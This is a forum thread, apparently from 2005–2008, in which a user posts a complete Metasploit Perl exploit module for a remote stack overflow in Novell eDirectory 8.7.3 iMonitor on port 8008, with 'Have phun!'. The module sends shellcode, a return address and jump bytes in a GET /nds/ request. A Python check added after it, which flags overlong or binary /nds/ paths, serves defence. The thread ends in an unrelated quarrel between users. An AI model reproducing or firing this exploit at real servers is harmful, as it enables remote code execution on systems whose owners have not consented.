Jul 25, 2008

Novell eDirectory iMonitor Remote Buffer Overflow - running on port 8008

machinamedia
Here's the advisory: http://www.frsirt.com/english/advisories/2005/1403

CODE
package Msf::Exploit::edirectory_imonitor;
use strict;
use base "Msf::Exploit";
use Pex::Text;

my $advanced = { };

my $info =
{
    'Name' => 'eDirectory 8.7.3 iMonitor Remote Stack Overflow',
    'Version' => '$Revision: 1.1 $',
    'Authors' =>
        [
            'Anonymous',
        ],
    'Arch' => [ 'x86' ],
    'OS' => [ 'win32', 'winxp', 'win2k', 'win2003' ],
    'Priv' => 1,

    'AutoOpts' =>
        {
            'EXITFUNC' => 'thread'
        },

    'UserOpts' =>
        {
            'RHOST' => [1, 'ADDR', 'The target address'],
            'RPORT' => [1, 'PORT', 'The target port', 8008 ],
            'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
            'SSL' => [0, 'BOOL', 'Use SSL'],
        },

    'Payload' =>
        {
            'Space' => 0x1036,
            'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%",
            'Keys' => ['+ws2ord'],
        },

    'Description' => Pex::Text::Freeform(qq{
        This module exploits a stack overflow in eDirectory 8.7.3 iMonitor
        service.
    }),

    'Refs' =>
        [
            ['BID', 14548],
        ],

    'Targets' =>
        [
            [ 'Windows (all versions) - eDirectory 8.7.3 iMonitor', 0x63501f15] # pop/pop/ret
        ],

    'Keys' => ['imonitor'],
};

sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
    return($self);
}

sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_idx = $self->GetVar('TARGET');
    my $shellcode = $self->GetVar('EncodedPayload')->Payload;
    my $target = $self->Targets->[$target_idx];

    $self->PrintLine( "[*] Attempting to exploit " . $target->[0] );

    my $s = Msf::Socket::Tcp->new(
        'PeerAddr' => $target_host,
        'PeerPort' => $target_port,
        'SSL' => $self->GetVar('SSL'),
    );

    if ( $s->IsError ) {
        $self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
        return;
    }

    # pop/pop/ret in ndsimon.dlm on our jump to our shellcode
    my $req = $shellcode . "\x90\x90\xeb\x04" . pack('V', $target->[1]) .
        "\xe9\xbd\xef\xff\xff" . ("B" x 0xD0);
    my $request =
        "GET /nds/$req HTTP/1.1\r\n".
        "Accept: */*\r\n".
        "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
        "Host: $target_host:$target_port\r\n".
        "Connection: Close\r\n".
        "\r\n";

    $s->Send($request);

    $self->PrintLine("[*] Overflow request sent, sleeping for four seconds");
    select(undef, undef, undef, 4);

    $self->Handler($s);
    return;
}

1;


Have phun!
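
A defensive check that follows from the request the module above builds (an added example, not part of the original post or of Metasploit): the module places a payload region of up to 0x1036 bytes plus 0xD0 filler bytes in the URL path after /nds/, so a proxy or IDS hook in front of port 8008 can flag /nds/ paths that are far too long or carry raw binary bytes. The function names, the 1024-byte threshold and the sample requests are assumptions constructed for illustration.

```python
MAX_NDS_PATH = 1024  # assumed limit; tune to the longest legitimate /nds/ URL you see


def inspect_request(raw: bytes) -> list:
    """Return reasons a raw HTTP request sent to iMonitor (port 8008) is suspect."""
    line = raw.split(b"\r\n", 1)[0]
    method, _, rest = line.partition(b" ")
    target, sep, _version = rest.rpartition(b" HTTP/")
    if not method or not sep:
        return ["malformed-request-line"]
    if not target.lower().startswith(b"/nds/"):
        return []
    path = target[len(b"/nds/"):]
    reasons = []
    if len(path) > MAX_NDS_PATH:
        reasons.append("nds-path-length=%d" % len(path))
    # Machine code and packed addresses appear as bytes outside printable ASCII.
    binary = sum(1 for b in path if b < 0x21 or b > 0x7E)
    if binary:
        reasons.append("non-printable-bytes=%d" % binary)
    return reasons


def scan(requests):
    """Return (index, reasons) for every request that inspect_request flags."""
    hits = []
    for i, raw in enumerate(requests):
        reasons = inspect_request(raw)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed samples: inert filler bytes only, sized like the request the module builds.
HEADERS = b" HTTP/1.1\r\nHost: 192.0.2.10:8008\r\nConnection: Close\r\n\r\n"
SAMPLES = [
    b"GET /nds/example-page" + HEADERS,
    b"GET /index.html" + HEADERS,
    b"GET /nds/" + b"\xa5" * 0x1036 + b"B" * 0xD0 + HEADERS,
    b"garbage-without-a-request-line\r\n\r\n",
]

if __name__ == "__main__":
    for index, reasons in scan(SAMPLES):
        print(index, ", ".join(reasons))
```

Length alone already separates the oversized request from normal browsing; the byte-class check also catches a shorter path that still carries binary data.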


melkonianarg
Ooooo, nasty...hope that has not caused you any problems...


machinamedia
QUOTE(melkonianarg @ Aug 22 2005, 08:52 PM)
Ooooo, nasty...hope that has not caused you any problems...

What exactly do you mean?


melkonianarg
Well, do you run one of these servers? Have you been remotely accessed through a network? Does this security threat have any relevance to you?


machinamedia
QUOTE(melkonianarg @ Aug 23 2005, 04:15 PM)
Well, do you run one of these servers? Have you been remotely accessed through a network? Does this security threat have any relevance to you?

I thought you were saying that the post caused me problems... That's it! Sorry if you feel so irritated by a simple question and you answer in that sarcastic tone. Next time better don't answer... It's same!
